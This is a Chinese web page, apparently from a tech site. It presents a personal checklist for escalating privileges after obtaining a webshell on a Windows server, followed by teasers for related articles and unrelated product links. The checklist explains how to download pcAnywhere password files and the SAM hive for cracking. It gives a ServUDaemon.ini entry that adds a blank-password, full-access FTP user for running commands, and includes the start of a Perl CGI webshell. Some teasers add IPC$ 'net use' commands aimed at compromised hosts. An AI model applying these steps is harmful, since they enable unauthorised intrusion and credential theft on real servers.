提升权限的个人总结 提升权限有哪些技巧?
当我们取得一个webshell时候,下一部要做的就是提升权限
个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码
c:\winnt\repaire 下是备份
用到破解sam密码的软件有LC,SAMinside
3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=dede|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
什么是环境变量?path变量起什么作用?
首先,我们先了解下什么叫环境变量!环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,比如临时文件夹位置和系统文件夹位置等等。这点有点类似于DOS时期的默认路径,当你运行某些程时序除了在当
详情2018-01-29 12:13:50责编:llp 来源:驱动管家什么是密码破解?密码破解的攻击方式有哪些?
密码与用户帐户的有效利用是网络安全性的最大问题之一。在本文中,Rob Shimonski将研究密码破解:如何以及为何进行密码破解。Rob将只说明渗透网络是多么简单,攻击者如何进入网络、他们使用的工具以及抗击它的方
详情2018-01-09 10:59:32责编:llp 来源:驱动管家什么是肉鸡?得到肉鸡后命令的中英对照
net use $ "> ipipc$Content$nbsp; "密码 " user: "用户名 " 建立IPC非空链接 net use h: $ "> ipc$Content$nbsp; "密码
详情2018-01-23 18:51:30责编:llp 来源:驱动管家cmos是什么?丢失cmos密码后怎么破解cmos密码?
CMOS是微机主板上的一块可读写的RAM芯片,用来保存当前系统的硬件配置和用户对某些参数的设定。CMOS可由主板的电池供电,即使系统掉电,信息也不会丢失。CMOS RAM本身只是一块存储器,只有数据保存功能,而对CMO
详情2018-01-30 17:27:43责编:llp 来源:驱动管家open ssl的相关知识 open ssl的各种概念解析
OpenSSL的各种概念解析:公钥 私钥 签名 验证签名 加密 解密 非对称加密我们一般的加密是用一个密码加密文件,然后解密也用同样的密码 这很好理解,这个是对称加密 而有些加密时,加密用的一个密码,而解密用另外一组
详情2018-01-13 13:59:29责编:llp 来源:驱动管家如何导出日志文件到web目录来获得shell?
dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成
详情2018-02-10 19:31:19责编:llp 来源:驱动管家遨游游览器更新版本修复的三个问题分别是什么?
在80sec通知遨游存在的安全漏洞之后,遨游于6 30号发布了新版的浏览器,修复了前面提到的安全漏洞,此次更新修复了三个安全问题,主要的问题细节如下:漏洞来源:http: www 80sec com release maxthon-vulns-poc
详情2018-01-24 13:27:49责编:llp 来源:驱动管家网络受到arp攻击怎么办?下面七种简单方法可以帮你快速解决
在局域网内,ARP攻击依然占有很高比例。众所周知,ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。ARP协议的基础就是信任局域网内所有的人,那么就很容易实现在以太
详情2018-01-23 18:20:29责编:llp 来源:驱动管家如何防止网站成为黑网站呢?要做这些事
1 设置严密权限上传目录只给写入、读取权限绝对不能给执行权限每个网站WebSite使用独立用户名和密码权限设置为Guest命令: net localgroup users myweb del设置MSSQL、Apache、MySQL以Guest权限运行:在运
详情2018-01-19 11:29:50责编:llp 来源:驱动管家fckeditor是什么?fckeditor jsp版存在什么漏洞?
FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多WEB项目和
详情2018-01-23 16:59:59责编:llp 来源:驱动管家
- win7 AMD显卡控制面板打不开?更新相应显卡驱动就可以搞定
- 360密盘是什么?360密盘是怎么用的?
- cajviewer阅读器怎么样?cajviewer阅读器全屏显示怎么设置?
- 佳能的镜头有哪些?佳能镜头大全
- 几款不同的索尼投影摄像机参数对比介绍
- eclipse字体大小设置的方法和步骤详解
- win10电脑设置开机密码的技巧你知道了吗
- vivo x20 plus和vivo x20哪个好?vivo x20 plus和vivo x20的评测
- oppo a57好不好?oppo a57有哪些槽点?
- pdf文件怎么修改?pdf文件可以进行编辑修改吗?
- 用什么方法可以消灭qq广告?彻底消灭qq广告的方法
- iebook超级精灵怎么给电子杂志设置背景音乐?
- 函数查询怎么做?怎样在Access上查询数据?
- 关于摄像机各类参数最详细的一些介绍
- 人像镜头哪款值得入手?人像镜头的介绍推荐
- 屏保设置方法:win7系统怎么设置屏保
- 电脑锁屏怎么设置?win7电脑设置锁屏的方法
- 三星galaxy s4卸载软件的方法是什么?三星galaxy s4卸载软件的步骤
- vivo x3有多薄?看看vivo x3的真机照就知道了
- 怎样把jpg转换成pdf文档?jpg转换成pdf的方法是什么?